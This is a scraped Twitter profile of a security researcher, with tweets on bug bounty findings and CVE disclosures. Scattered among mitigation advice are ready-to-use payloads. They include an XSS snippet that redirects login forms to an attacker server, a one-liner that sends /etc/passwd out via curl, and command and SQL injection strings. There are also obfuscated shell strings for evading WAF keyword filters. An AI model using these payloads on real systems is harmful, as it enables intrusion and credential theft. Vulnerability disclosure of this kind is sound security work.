Bipin Jitiya @win3zz Twitter profile

Pinned Tweet

Bipin Jitiya

4 years

As I previously promised I would publish a writeup on how I managed to find the SSRF bug on the biggest social media website, Facebook. So I wrote a blog about that finding. I hope you like it. 🍷 #BugBounty #Infosec

How I made $31500 by submitting a bug to Facebook

Every idea needs a Medium

link.medium.com

67

670

2K

Last Seen Profiles

@achaamoody

@QuincySkinnerJr

@AskDocG

@lunatic_cospjp

@DennyKayla47476

@realdealDD

@nyeshajoyce

@sadmanonthehill

@oyakosebay

@jewelsproject

@papmantan69_

@leila_bs78

@zenlucent

@Conflict_arch

@deplorableYTubr

@YPelekhach53819

@goatmanNT

@ayan72996812075

@doan8_matt

@pengen_stw

@ladyballsmcgee

@jandakembangstw

@BartuschatT

@Coach_Charlton

@nyeshajoyce

@jandakembangstw

@InfoTZP

@Wayne_Sleep

@Enciphered

@Jatavionsanders

@AskDocG

@41a7ddadabe047e

@jaatni_monika

@Favhdd

@KasihLudah

@abdikaderore

Bipin Jitiya

@win3zz

9 months

20

293

2K

Bipin Jitiya

@win3zz

4 years

Facebook rewarded me with a bounty of $30000 for SSRF on prod server (Internal Access 😎). #BugBounty #Facebook

50

119

1K

Bipin Jitiya

@win3zz

10 months

CVE-2023-26469: A critical RCE explained 👇 #CyberSecurity

6

258

872

Bipin Jitiya

@win3zz

2 years

I wonder why some sys-admins configure the server with sudo privileges! 🤔 Tip: Always test for Expression Language Injection like OGNL when you see *.do and *.action file extensions. #security #bugbountytip #hacking

22

218

819

Bipin Jitiya

@win3zz

9 months

After so many requests, here is my clarification on the previous post:

9

172

822

Bipin Jitiya

@win3zz

1 year

Find leaked API Keys and Secrets using a single GitHub search query Tip: Never commit your keys/secrets to your public repository #Security #DataLeak #Hacking

15

231

813

Bipin Jitiya

@win3zz

4 months

CVE-2024-25600: Unauth. RCE vulnerability caused by PHP code injection in Bricks Builder, a WordPress site builder with over 25,000+ active installations. Severity: Critical (CVSS 9.8) Root cause analysis: PoC: Mitigation: Upgrade

10

219

818

Bipin Jitiya

@win3zz

1 year

If an unsafe logger is used, an attacker can inject code and execute arbitrary commands, even if the page being accessed is a 404 page. Always test HTTP request headers to make sure the application is handling the headers correctly. #Security #bugbountytips #Hacking #OOB_RCE

30

207

791

Bipin Jitiya

@win3zz

4 months

Password Reset Token Leak Full Case Study:

6

164

620

Bipin Jitiya

@win3zz

4 years

New write-up alert. My second write-up is out. This is about the reflected cross-site scripting (rXSS) vulnerabilities I found on Facebook. I hope you like it. 🥂 #BugBounty #Infosec

Simple story of some complicated XSS on Facebook

Hello, World! ❤️

link.medium.com

4

211

579

Bipin Jitiya

@win3zz

1 year

Pre-login XSS? Attackers can steal credentials by changing HTML form action: <script>x=document.querySelector('form');x.setAttribute('method','GET');x.setAttribute('action',' http://attack-server/');</script> Try it out: #infosec #bugbountytips #XSS

19

191

576

Bipin Jitiya

@win3zz

2 months

CVE-2024-3400: OS Command Injection Vulnerability in GlobalProtect Gateway Severity: CRITICAL (10/10) ⚠️ Poc: Other info:

11

131

581

Bipin Jitiya

@win3zz

1 year

Testers! Add "ui_config.properties" and "" files to your wordlist, these files contain juicy info like secret tokens and passwords. Excitingly, discovered two on production servers of multinational telecom and IT giants! #security #Pentesting #Hacking

14

126

490

Bipin Jitiya

@win3zz

7 months

PHP developers commonly create .inc files with PHP code for inclusion in other scripts using include or require statements. However, if the server doesn't parse .inc files as PHP, attackers can view your source code by accessing the file directly.

6

79

466

Bipin Jitiya

@win3zz

8 months

/..;/

17

89

459

Bipin Jitiya

@win3zz

17 days

CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

2

71

419

Bipin Jitiya

@win3zz

1 year

CVE-2023-25157 - Working PoC - GeoServer SQL Injection Severity: Critical (9.8/10) ⚠️ #infosec #Hacking #Security #SQLInjection

9

119

408

Bipin Jitiya

@win3zz

10 months

CVE-2023-21939 - Code Exec - PoC

3

93

393

Bipin Jitiya

@win3zz

10 months

CVE-2023-20073 - Arbitrary File Upload and Stored XSS PoC: Write-up: Vendor Advisory: #infosec #vulnerability

4

115

342

Bipin Jitiya

@win3zz

5 months

Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations PoC: Blog: Security Advisory:

1

83

337

Bipin Jitiya

@win3zz

11 months

CVE-2023-34960 Root cause: #Security #infosec #Hacking

3

91

322

Bipin Jitiya

@win3zz

2 months

Time-Based Blind SQL Injection in Oracle 'and 1=DBMS_PIPE.RECEIVE_MESSAGE(1,10)--

10

60

324

Bipin Jitiya

@win3zz

11 months

This is what happens when your JWT signature key is exposed. Remember, don't hardcode or commit sensitive keys/tokens in public repositories. #Security #vulnerability #Hacking

6

87

317

Bipin Jitiya

@win3zz

7 months

PoC - Privilege Escalation in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629) Code is available at: For more details, refer to the original research article:

0

97

300

Bipin Jitiya

@win3zz

9 months

CVE-2023-43261 - PoC Credential Leakage Through Unprotected System Logs and Weak Password Encryption PoC:

2

102

299

Bipin Jitiya

@win3zz

8 months

CVE-2023-45852: Vitogate 300 Authentication Bypass and RCE Ref:

4

55

249

Bipin Jitiya

@win3zz

6 months

CVE-2023-51467: Apache OfBiz Auth Bypass and RCE Severity: critical (CVSS 9.8) Root cause: Mitigation: Upgrade Apache OFBiz Ref:

1

81

293

Bipin Jitiya

@win3zz

11 months

- POST HTTP request possible with any non-existent path after "/console/" (e.g., /console/any/non-existent/path/xyz.html) - Arbitrary Content-Type & POST body content reflects in response without output encoding - UAT also affected -

7

73

281

Bipin Jitiya

@win3zz

1 year

Thousands of government websites are still vulnerable to CVE-2023-25157 #exploit #Security

8

55

274

Bipin Jitiya

@win3zz

2 months

Path Traversal Affecting Multiple CData Products CRITICAL SRC: PoC: 👇

1

61

253

Bipin Jitiya

@win3zz

10 months

PHP extract() & Dynamic Function Lead to RCE. While functions like system(), exec(), and shell_exec() are often sanitized, extract() is different because it can overwrite existing variables. This unique behavior can enable hackers to create undetectable backdoors. #Security #PHP

3

61

252

Bipin Jitiya

@win3zz

11 months

Metabase Pre-auth RCE (CVE-2023-38646) PoC 👉 #Security #OOBRCE #infosec

4

84

241

Bipin Jitiya

@win3zz

10 months

CVE-2023-38035 - Unauth. RCE PoC: 👇 python3 -c "from pyhessian.client import HessianProxy as H; H(' https://TARGET-DOMAIN:8443/mics/services/MICSLogService').uploadFileUsingFileInput({'command': 'curl -X POST -d @/etc/passwd ', 'isRoot': True}, None)"

3

74

230

Bipin Jitiya

@win3zz

1 year

An old WebLogic Server RCE Details 👉 #Security #bugbountytip #hacking

2

71

225

Bipin Jitiya

@win3zz

4 months

I recently found an information disclosure bug in a live application. Some REST API follow a convention where singular endpoints (/api/v1/user/12345) return information about a single entity, while plural endpoints (/api/v1/users) return collections of entities.

6

28

227

Bipin Jitiya

@win3zz

8 months

CVE-2023-3710: Critical (9.8/10) #CommandInjection in Honeywell PM43 Printers Mitigation: Upgrade firmware! Verify: curl -X POST -d "username=x%0aCOMMAND%0a&userpassword=1" " http://PRINTER/loadfile.lp?pageid=Configure" Details: PoC:

2

62

219

Bipin Jitiya

@win3zz

7 months

RCE in Traccar GPS Tracking System (4.4k GitHub stars). Authenticated users can upload and overwrite velocity templates (.vm). An attacker can overwrite 'passwordReset.vm' with malicious content, and trigger execution via '/api/password/reset' with a valid email ID as POST param

3

45

212

Bipin Jitiya

@win3zz

2 months

Auth. Bypass (CVE-2024-28255) and SpEL Injection (CVE-2024-28254) in OpenMetadata lead to a critical RCE (OOB Data Exfiltration). Technical details & PoC: Mitigation: Update to Patched v1.2.4 or newer. Credit for the original discovery goes to @pwntester

4

56

215

Bipin Jitiya

@win3zz

11 months

I've spent a long time finding security vulnerabilities in Facebook. Today, I'm sharing interesting IT assets I came across during security testing. I'm excited about contributions and hope this will save the time of many pen-testers. #Security #Facebook

GitHub - win3zz/Meta-Owned-IT-Assets: Curated list of Meta (formerly Facebook) owned IT assets

Curated list of Meta (formerly Facebook) owned IT assets - win3zz/Meta-Owned-IT-Assets

github.com

3

60

215

Bipin Jitiya

@win3zz

1 year

From code execution to S3 data leak, my latest blog post is on the journey of discovering a bug in Meta (Facebook). You don't want to miss this! #infosec #hacking #pentesting

Facebook bug: A Journey from Code Execution to S3 Data Leak

A Tale of Two Threats: OS Command Injection and Data Leak in Meta’s (formerly Facebook) Careers Platform

medium.com

6

78

212

Bipin Jitiya

@win3zz

11 months

CVE-2023-23333 - SolarView series up to version 8.00 affected #Security #SolarView

3

49

205

Bipin Jitiya

@win3zz

10 months

CVE-2023-39141 - WebUI-Aria2 - Path traversal Root cause: CVE: #Security #PathTraversal

1

69

202

Bipin Jitiya

@win3zz

9 months

Task Hijacking Vulnerability in WhatsApp - Android STEALING OTP SMS #CyberSecurity

Task Hijacking Vulnerability in WhatsApp - Android

Task Hijacking Vulnerability in WhatsApp - Android - Task-Hijacking-WhatsApp.md

gist.github.com

3

59

190

Bipin Jitiya

@win3zz

10 days

For executing Groovy code with a simpler and smaller payload, use: Exception('COMMAND'.execute().text)

Bipin Jitiya

@win3zz

17 days

CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

2

71

419

2

40

185

Bipin Jitiya

@win3zz

9 months

t\a\c$@</*?c/*?*?*w\d works too!

2

24

177

Bipin Jitiya

@win3zz

11 months

If you come across a target that hosts Zendesk, don't forget to fuzz their API endpoints for potential misconfigurations and information leaks. But be cautious! The list includes various deletion endpoints as well. List of Zendesk API endpoints:

List of Zendesk API Endpoints for Fuzzing [Penetration Testing]

List of Zendesk API Endpoints for Fuzzing [Penetration Testing] - zendesk_endpoints.txt

gist.github.com

2

68

181

Bipin Jitiya

@win3zz

5 months

Always look for what the developers want to hide from you. It's better to analyze raw HTTP responses! #bugbountytips

6

22

174

Bipin Jitiya

@win3zz

4 years

I seen that many people are very excited for writeup. As I promised earlier, I will publish it. It will take time, because I have other similar findings (on Facebook) that are not yet resolved.

5

7

162

Bipin Jitiya

@win3zz

3 months

CVE-2024-1212: Unauth. Command Injection in Progress Kemp LoadMaster Severity: Critical Root cause analysis: Mitigation: Upgrade to patched version 7.2.59.2.22338 or later. Credit for the original discovery goes to @daveysec of @RhinoSecurity

4

42

171

Bipin Jitiya

@win3zz

1 year

Tools that make my #InfoSec life easy🕵️‍♂️ AFL Burp Suite checkov dirsearch Frida httpx IDA jadx-gui John The Ripper Linux utilities (Netcat/nc, curl, gdb, sed, man, BusyBox, nohup, etc) Metasploit mimikatz MobSF Nessus ngrok Nmap SQLmap WireShark Ysoserial Know more tools? Reply👇

9

31

136

Bipin Jitiya

@win3zz

10 months

CVE-2022–39986 - RaspAP - Unauth. RCE Root cause: Verify-patch: curl -X POST -d 'cfg_id=;id;#' http://TARGET/ajax/openvpn/del_ovpncfg.php #Security #infosec #Hacking

0

54

139

Bipin Jitiya

@win3zz

7 months

CVE-2023-34212: Java Deserialization via JNDI Components in Apache NiFi Ref:

0

44

136

Bipin Jitiya

@win3zz

3 months

CVE-2024-29269: TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution Severity: Critical Details: PoC:

1

47

126

Bipin Jitiya

@win3zz

9 months

Here is my detailed write-up on exploiting some vulnerabilities in Industrial Cellular Router. Don't miss it! #CyberSecurity #Hacking

Inside the Router: How I Accessed Industrial Routers and Reported the Flaws

Router Vulnerability Hunt, From Google Dorks to Firmware Emulation — The Full Story

medium.com

1

37

125

Bipin Jitiya

@win3zz

1 year

Execute OS commands in stealth mode, 🕵️‍♀️✨ No traces of Runtime.exec(), ProcessBuilder, Apache Commons Exec. Power of custom class loaders and bytecode magic! #infosec #Pentesting #Hacking #JavaUnderground

3

32

124

Bipin Jitiya

@win3zz

1 year

Just discovered that #ChatGPT can generate insecure deserialization payloads. #AI can ease the tedious task of finding gadget chains in Java. #infosec #Security #ArtificialIntelligence

2

23

120

Bipin Jitiya

@win3zz

5 months

CVE-2023-31446: Blind OS command injection (OOB data exfiltration) in Dodge OPTIFY platform Ref:

2

34

111

Bipin Jitiya

@win3zz

4 months

CVE-2023-47218: QNAP QTS and QuTS Hero Unauth. Command Injection Blog: Security Advisory: Mitigation: Upgrade Firmware (Control Panel > System > Firmware Update) Credit for the original discovery goes to @stephenfewer of @rapid7

1

43

115

Bipin Jitiya

@win3zz

10 months

Alert ⚠️ vm2, a widely used Node.js library, has severe security flaws (CVSS 9.8/10) allowing attackers to escape sandboxes and run malicious code. Project is discontinued. DO NOT use in production apps. Check PoCs by @0x10n 1. 2.

1

33

109

Bipin Jitiya

@win3zz

7 months

CVE-2023-5072: High Severity DoS Vulnerability in JSON-JAVA Mitigation: Update JSON-java to the latest version, 20231013. Ref:

0

40

102

Bipin Jitiya

@win3zz

5 months

FuanRuan FineReport unsafe deserialization Vulnerability analysis: PoC:

0

28

104

Bipin Jitiya

@win3zz

3 months

CVE-2024-3116: Remote Code Execution (RCE) in pgAdmin version 8.4 or below. Severity: HIGH Mitigation: Upgrade Proof of Concept: . Patch Commit: Advisory: Credit for the original discovery goes to @aessadek

2

29

105

Bipin Jitiya

@win3zz

8 months

It is a telecom website that handles highly confidential information, so I can't share other details. Further exploitation depends on server configuration. For more information, please refer to a highly informative presentation by @orange_8361 at BlackHat.

Breaking Parser Logic: Take Your Path Normalization off and Pop 0days...

We propose a new exploit technique that brings a whole-new attack surface to defeat path normalization, which is complicated in implementation due to many im...

www.youtube.com

Bipin Jitiya

@win3zz

8 months

/..;/

17

89

459

1

19

102

Bipin Jitiya

@win3zz

2 years

Check out my latest blog on how I compromised a banking server by exploiting some vulnerabilities. The journey from AFR to RCE. I hope you'll like it. 🥂 #security #infosec #hacking

Remote Command Execution in a Bank Server

A detailed article on how I exploited Remote Command Execution (RCE) with the help of the Vulnerability Chain.

link.medium.com

7

35

90

Bipin Jitiya

@win3zz

8 months

PHP 7.4's function name and opcode manipulation to execute function declared in non-top-level scope with the null terminator trick. Technical details: #PHPSecurity #OpcodeManipulation #CTFChallenge

1

19

89

Bipin Jitiya

@win3zz

5 months

Low-info bugs, when combined with other vulnerabilities, can escalate into severe security issues. For example, consider this path traversal technique leading to Auth Bypass: @hacks_zach @malcolmx0x @IslamRalsaid1 @JamesHorseman2

CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Deep-Dive – Horizon3.ai

CVE-2024-0204 Fortra GoAnywhere MFT Deep-Dive and Indicators of Compromise. This blog details the authentication bypass which allows an unauthenticated attacker to add an administrative user to the...

www.horizon3.ai

Bipin Jitiya

@win3zz

8 months

/..;/

17

89

459

2

20

85

Bipin Jitiya

@win3zz

9 months

@bugoverfl0w e\c\h\o$IFS-e$IFS'\x63\x61\x74\x20\x2F\x65\x74\x63\x2F\x70\x61\x73\x73\x77\x64'|/???/\b**\h

4

9

75

Bipin Jitiya

@win3zz

6 months

CVE-2023-51467: Apache OfBiz Auth Bypass and RCE

CVE-2023-51467: Apache OfBiz Auth Bypass and RCE. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

Bipin Jitiya

@win3zz

6 months

CVE-2023-51467: Apache OfBiz Auth Bypass and RCE Severity: critical (CVSS 9.8) Root cause: Mitigation: Upgrade Apache OFBiz Ref:

1

81

293

0

14

75

Bipin Jitiya

@win3zz

8 months

CVE-2023-38545: A heap buffer overflow vulnerability in cURL, which gained attention due to an early patch exposure. Exploitation requires certain conditions, like the use of SOCKS proxies and certain redirect settings. This cannot be used to convert SSRF into RCE. #infosec

3

11

67

Bipin Jitiya

@win3zz

5 years

I just earned $1000 by found a SSRF in Facebook production servers. I would like to thanks Facebook Security Team for rewarding me with this great bounty, thank you guys. #writeup soon

6

67

Bipin Jitiya

@win3zz

8 months

Security Research != Bug Bounty Hunting ...but they share a common goal of identifying and mitigating vulnerabilities Do you agree? Share your thoughts in the comment section!

5

4

54

Bipin Jitiya

@win3zz

4 years

Dear Infosec People, Something cool is coming today! Stay tuned. ⚡ #Hacking #CyberSecurity #Infosec

1

0

50

Bipin Jitiya

@win3zz

4 years

This made my day ❤️ | Thanks Synack Red Team #MondayMotivaton

0

50

Bipin Jitiya

@win3zz

1 month

Do you know the first SQL injection, discovered in 1998 by Jeff Forristal (pseudonym "Rain Forest Puppy"), detailed in the hacker zine Phrack, demonstrated how to inject SQL payloads into legitimate commands to extract sensitive information from databases?

0

12

52

Bipin Jitiya

@win3zz

10 months

Here's why you shouldn't run public exploits blindly 👉 #Security #Exploit #threats

2

15

51

Bipin Jitiya

@win3zz

1 year

Merry Christmas everyone🎄 Just published a new article on Testing Online Exam/Quiz Software (thick client). Check it out! I hope you'll learn something new. 🙌 #Security #infosec #Hacking

Cracking Online Test/Quiz Software: Attack and Defense

In this blog, I will demonstrate how easily anyone can crack online test/quiz software if it is poorly developed.

link.medium.com

0

15

45

Bipin Jitiya

@win3zz

1 year

"True hacking expertise goes beyond certifications" Any thoughts?

13

4

45

Bipin Jitiya

@win3zz

4 years

📣 My portfolio website is live! Feel free to check it out. Don't forget to enable hacker mode. 👨‍💻 #portfoliowebsite #cybersecurity #hacking #infosec

12

1

45

Bipin Jitiya

@win3zz

4 months

Some major vulnerabilities have been publicly disclosed in the last decade. Please reply if any were missed.

0

6

41

Bipin Jitiya

@win3zz

1 month

Post-Authentication Command Injection in CHAOS (Remote Administration Tool) Attackers can exploit this flaw via the "filename" parameter in a multipart/form-data HTTP POST request sent to http://CHAOS_RAT_IP:8080/generate Reference:

0

9

41

Bipin Jitiya

@win3zz

8 months

CVE-2023-46501: BoltWire v6.03 - Passwords Disclosure Mitigation: Update BoltWire CMS Details:

0

11

42

Bipin Jitiya

@win3zz

3 months

Sysadmins & Devs: Resist the temptation to stash Azure creds (plaintext) in /etc 🔴 - Use token-based authentication (temporary credentials) for specific services and implement token rotation policies to regularly refresh and expire access tokens. ✅

3

7

39

Bipin Jitiya

@win3zz

8 months

Major Web Security Vulnerabilities: Occurrence, Causes, and Escalation

1

11

37

Bipin Jitiya

@win3zz

2 years

@ynsmroztas

GitHub - win3zz/CVE-2017-5638: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution...

Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution - Shell Script - win3zz/CVE-2017-5638

github.com

0

6

35

Bipin Jitiya

@win3zz

5 years

Unsafe coding practices results in costly vulnerability! 👨‍💻

3

1

35

Bipin Jitiya

@win3zz

11 days

I reported similar CSS injection and JavaScript injection issues to GitHub around six months ago. However, the JavaScript code was not executed due to CSP, and the issues were marked as duplicates.

cts 🌸

@gf_256

12 days

so umm... yea lets just say ... github has a css injection 😳

65

278

4K

3

34

Bipin Jitiya

@win3zz

9 months

@AhmedMa07846126 Sometimes, you may get OS command injection on the target website, but the payload may be blocked by the Web Application Firewall (WAF) due to restricted keywords like "echo", "/etc/", "cat", "passwd", etc. This is a WAF bypass technique to successfully deliver the payload.

2

1

32

Bipin Jitiya

@win3zz

4 years

Acknowleged by CERT-EU | Hall Of Fame #Appreciation @CERTEU @EU_Commission

5

1

31

Bipin Jitiya

@win3zz

7 months

To configure Apache to parse ".inc" files as PHP: 1. Open your Apache configuration file (httpd.conf). 2. Add the following line within the <IfModule mod_php.c> section: AddType application/x-httpd-php .inc 3. Restart Apache.

0

1

31

Bipin Jitiya

@win3zz

5 years

When you do research on something and by mistake you break an innocent who comes on your way. #NotIntentionally

0

1

28

Bipin Jitiya

@win3zz

1 year

Introducing Cuberks solutions, a company dedicated to helping businesses protect their online assets. Follow us on Twitter @Cuberks for updates and expert advice. #cybersecurity #infosec #CuberkSolutions

11

4

28

Bipin Jitiya

@win3zz

1 year

Get ready for an inside look into the journey from code execution to S3 data leak. Stay tuned for my upcoming blog post about a bug that I discovered in the world's biggest social media platform! #cybersecurity #bugbounty #infosec

4

0

28

Bipin Jitiya

@win3zz

5 months

Multiple Linux Distros face 2 high-severity vulns (CVSS 7.8): 1. CBT File Parsing allows Argument Injection leading to RCE PoC: 2. EPUB File Parsing allows Directory Traversal leading to RCE PoC: Blog: